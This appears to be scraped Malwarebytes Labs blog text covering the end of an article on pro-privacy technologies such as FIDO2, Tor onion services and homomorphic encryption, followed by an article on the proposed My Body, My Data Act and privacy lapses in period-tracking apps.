DNS encryption restores your privacy by making it impossible for anything other than the DNS resolver to read and respond to your queries. You still have to trust the resolver you send your requests to, but the eavesdroppers are out in the cold.

DNS encryption is new, and still relatively rare, but it is supported natively by modern versions of Windows, macOS, Android, and iOS, as well as a number of different DNS clients, proxies and applications, including the DNS Filtering module for the Malwarebytes Nebula platform. It’s ascendancy seems assured.

**Passwordless authentication**

Passwordless authentication could usher in a world where we no longer rely on passwords, and that could be an enormous, unabashed win for security and peace of mind. The trouble is, that has been true for a _very long time indeed_, and it hasn’t happened yet.

There is reason to hope that things are finally about change though.

Passwords are a great idea in theory that fail horribly in practice. Humans are poorly equipped to create and remember them, and demonstrably poor at building systems that handle them securely. And yet almost every Internet account requires one. The inevitable result is an epidemic of poor passwords and an entire criminal industry preying on them with relentless automated attacks.

For a long time, the successor to the password was widely presumed to be some form of biometric authentication—such as face or fingerprint recognition—but nobody could agree which one. With multiple novel, competing, costly, and incompatible alternatives, passwords remained the clear winner.

The solution to that gridlock was FIDO2.

FIDO2 is a specification that uses public key encryption for authentication. This allows users to log in to websites without sharing a secret that needs to be secured like a password. There is nothing for a programmer to secure, nothing for an attacker to guess, and nothing that can be stolen in a data breach.

The sensitive encrpytion work all happens on a device owned by the user, which can be a specialist hardware key, a phone, a laptop, or any other compatible device. FIDO2 doesn’t specify what the device is, or how it should be secured, only that a user must make a “gesture” to approve the authentication. This leaves device manufacturers free to use whatever “gesture” works best for them: PIN numbers, swipe patterns, and any and all forms of biometrics. The end result is a technology that allows you to log in to a website securely using Windows Hello, Apple’s Touch ID, and any number of other methods that exist now or could be created in the future.

Passwordless authentication is possible today but still extremely rare. However, it took a big step forward in May this year when Google, Microsoft, and Apple made simultaneous, coordinated pledges to increase their adoption of the FIDO2 standard.

**Onion networking**

Onion networking, the technology behind Tor and the “dark web”, has been around for twenty years, so it might seem an odd candidate for an emerging technology that could change everything—but what if that’s just because we’ve been thinking about it the wrong way?

Tor is a network of servers that allows software clients (like web browsers) and services (like websites) to communicate securely and anonymously. Although the software is extremely good at what it does, today it services a narrow niche of users who put privacy and security above all, and it has become strongly associated with ransomware, illegal drug markets, and other forms of unsavoury criminal activity.

According to security evangelist Alec Muffett, we are overlooking a very important aspect of this technology though. Muffett was previously a security engineer at Facebook, where he was responsible for putting the social network on Tor. Speaking to David Ruiz on a recent Malwarebytes Lock and Code podcast, he explained how he sees Tor as “a brand new networking stack for the Internet” that can “guarantee integrity, and privacy, and unblockability of communication.”

Every Tor address is also the cryptographic public key of the service you want to talk to. For example, the Facebook address is:

www.facebookwkhpilnemxj7asaniu7vnjjbiltxjqhye3mhbshg7kx5tfyd.onion

Having the public key act as the address provides cryptographic assurance that you are talking to the service you want to talk to, bypassing several layers of the OSI model, and cutting out fundamental Internet vulnerabilities, such as BGP hijacking.

We should stop thinking about Tor as just an anonymity tool, says Muffet. It should be attractive to anyone who cares about the integrity of their brand and what it has to say:

> If you are in the position of providing a forum, a messenger service, or news to a mass public … where your brand name is a really important part of your value proposition, then onion networking is for you, because you can make sure that no one can mess with your traffic.
> 
> Alec Muffet speaking to Lock and Code.

Although mainstream organizations like The New York Times, Pro Publica, Facebook, and Twitter have already embraced Tor, having a .onion site is still very much the exception. In all likelihood, it will take something quite dramatic to change that, but that doesn’t mean it can’t happen.

In 2013, Edward Snowden’s revelations about pervasive Internet surveillance triggered a huge gobal effort to make encrypted web traffic the norm, rather than the exception.

A similar stimulus today could tip onion networking from its niche into the mainstream.

**Cryptocurrencies**

People may be surprised to see cryptocurrencies appearing in our list. If cryptotrading sites are naming stadia and buying superbowl ads then cryptocurrencies are already mainstream and hardly a technology for the future, surely.

Its presence near the bottom of our list tells you that isn’t how we see it.

Cryptocurrencies face a number of cyclone-force headwinds, starting with the current, across-the-board, price crash. The market cap of the biggest currencies, Bitcoin and Ether, is shrinking fast, and some cryptocurrencies have already disappeared completely; the free flow of venture capital money is likely to dry up; there are issues with scalability, scams, rug pulls, thefts from exchanges, and environmental damage; and the pseudo-anonymity blockchains provide is challenged by our ever-improving capacity to identify patterns in payments.

More importantly, from the perspective of _life, liberty, and the pursuit of happiness_, almost nobody is using these currencies as actual currencies—nobody is paid in Bitcoin, and nobody is using Ether to buy groceries. Remember, Bitcoin was supposed to be a peer-to-peer electronic cash system not a vehicle for speculative trading.

So why is it on our list at all?

For all the reasons to dislike them or write them off, cryptocurrencies are hard to ignore. At its core, the original cryptocurrency, Bitcoin, was supposed to be a trustless, borderless payment system that was built on top of the Internet.

> What is needed is an electronic payment system based on cryptographic proof instead of trust, allowing any two willing parties to transact directly with each other without the need for a trusted third party.
> 
> “Satoshi Nakamoto”, from Bitcoin: A Peer-to-Peer Electronic Cash System

It was a vision of what freedom might look like in the digital age.

That desire for freedom propelled Bitcoin it in its early days, and the attractiveness of a private, peer-to-peer currency is undimmed, even if nobody has managed to actually build one that works yet.

The current crash will pass and the strongest ideas and technology will survive. We suspect that Satoshi’s original vision will be one of them, even if Bitcoin isn’t.

**Homomorphic encryption**

The cornerstone of digital privacy, security, and freedom is encryption, and the last item in our list is one of its holy grails: Encryption that never needs to be undone.

Encryption protects your data if your phone is stolen, and it makes your emails, credit card details, and WhatsApp messages tamper proof as they whizz around the Internet. And it’s what underpins all of the other things in our list.

And all of the examples above have something in common: They are either examples of encryption that’s used to protect data at rest, or data that’s in transit. Moving or storing data only gets you so far though, sooner or later it has to be used. It can’t be used unless it’s decrypted, and you need to trust whatever system has access to that decrypted data.

Homomorphic encryption algorithms allow mathematical operations to be performed on encrypted data, so that it doesn’t need to be decrypted at all, ever, even when it’s being used.

The result of performing a mathematical operation on the encrypted data is the same as if the data was decrypted, subject to a mathematical operation, and the answer encrypted.

This incredible act of needle threading needs to ensure that you can’t learn anything about the data from the ciphertext (the encrypted version of the data), and that you can’t learn anything at all about it by observing the mathematical operations performed on it.

If you had access to homomorphic encryption you wouldn’t have to trust anyone you share your data with, whether they are the vendors in your organization’s supply chain, or your favorite, data-hungry social network.

Almost unbelievably, homomorphic encryption algorithms already exist. The reason you don’t have access to their almost magical properties though is that they are prohibitively slow. It currently takes days for them to perform actions that we expect to take seconds.

Although slow, these algorithms are already millions of times quicker than they were just a few years ago. And while that rate of improvement will surely decelerate, the processing power of computers is still doubling every few years.

At some point in the not-too-distant future, when these two trends meet, it could change how we think about trust and freedom in the digital age completely.

5 pro-freedom technologies that could change the Internet

A new bill proposes the strongest Federal data privacy protections yet for reproductive and sexual health data.
The post My Body, My Data Act would lock down reproductive and sexual health data appeared first on Malwarebytes Labs.

A new bill entered into both the House of Representatives and the Senate proposes the strongest Federal data privacy protections yet for an increasingly scrutinized form of data in the United States—reproductive and sexual health data.

The “My Body, My Data Act of 2022” was announced in early June in response to a leaked draft of a Supreme Court opinion that reported to show the Court’s intentions to overturn a seminal decision from 1973 that guaranteed a Constitutional right to have a choice to an abortion. Congresswoman Sara Jacobs (D-CA), sponsor of the bill in the House of Representatives, said in a press release that she was focused on protecting reproductive health data in light of the new,  judicial threat.

“Since the Supreme Court leak, I’ve heard from so many people who are panicked about their personal reproductive health data falling into the wrong hands,” Jacobs said. “The My Body, My Data Act will protect that information, protect our privacy, and reaffirm our rights to make our own decisions about our bodies.”

The bill, which has 46 cosponsors in the House and 11 cosponsors in the Senate, would stop companies from collecting, using, retaining, and disclosing “personal reproductive or sexual health information” unless a company first receives express consent from a user or if a company is using such information to specifically deliver a service that a user has requested. The bill’s definition of “personal reproductive or sexual health information” is broad, including any information that could reveal a person’s attempts to “research or obtain” reproductive health services, any reproductive or sexual health conditions, such as pregnancy, menstruation, and whether a person is sexually active, and any information about procedures that a person has undergone related to reproductive or sexual health.

If passed, the bill would also extend new rights to consumers to access and delete personal reproductive or sexual health information from the companies that collect it.

Since the bill’s announcement last month, it has only gained more attention.

On June 24, the Supreme Court decided in the case _Dobbs v. Jackson Women’s Health Organization_ that the right to an abortion, which was guaranteed under a right to privacy as decided in 1973, was not “deeply rooted in this Nation’s history or tradition.” Voting 6 – 3, the Court overturned _Roe v. Wade_.

With the Court’s decision, immediate fear arose that reproductive health data could be requested by law enforcement only to be used as evidence to prosecute individuals seeking abortions—or even those who miscarried. The Digital Defense Fund responded to the Court’s decision by updating its resources on how individuals can keep their reproductive health decisions both private and secure. The group’s resources include a section on keeping reproductive health data out of the hands of “Big Tech.”

Further, several period-tracking apps independently announced efforts to anonymize user data so that even if law enforcement requested data about certain users, those companies could not respond in a meaningful way. Users have reportedly flocked to period-tracking apps that are making these promises, but as TechCrunch recently uncovered, one such company that announced new, pro-user plans last week—Stardust—was still sharing users’ phone numbers with third parties.

> “TechCrunch ran a network traffic analysis of Stardust’s iPhone app on Monday to understand what data was flowing in and out of the app. The network traffic showed that if a user logs into the app using their phone number (rather than through a login service provided by Apple or Google), Stardust will periodically share the user’s phone number with a third-party analytics service called Mixpanel.”

TechCrunch also reported that Stardust’s efforts to bring “end-to-end encryption” were potentially faulty, as the company’s founder described a data transfer process that may only provide encryption for data in transit and for data that is stored on Amazon’s web servers.  

The period-tracking app morass is familiar, then: Once again, users in America of any number of services are left to independently manage their interactions with companies that could be sharing their data with an immeasurable number of third parties which, to most consumers, are entirely unknown.

The My Body, My Data Act could change that, requiring new restrictions not on how data is technologically stored, but on whether such data is ever collected in the first place.

The bill also includes what is called a “private right of action,” meaning that consumers who have had their privacy rights violated under the law could be able to sue individual companies for those violations. The inclusion of a private right of action is exceedingly rare in nearly any data privacy law that has been introduced in both statewide legislation and before the Federal government.

The bill is currently supported by Planned Parenthood, NARAL, National Abortion Federation, URGE, National Partnership for Women & Families, and Feminist Majority.

Tag

#apple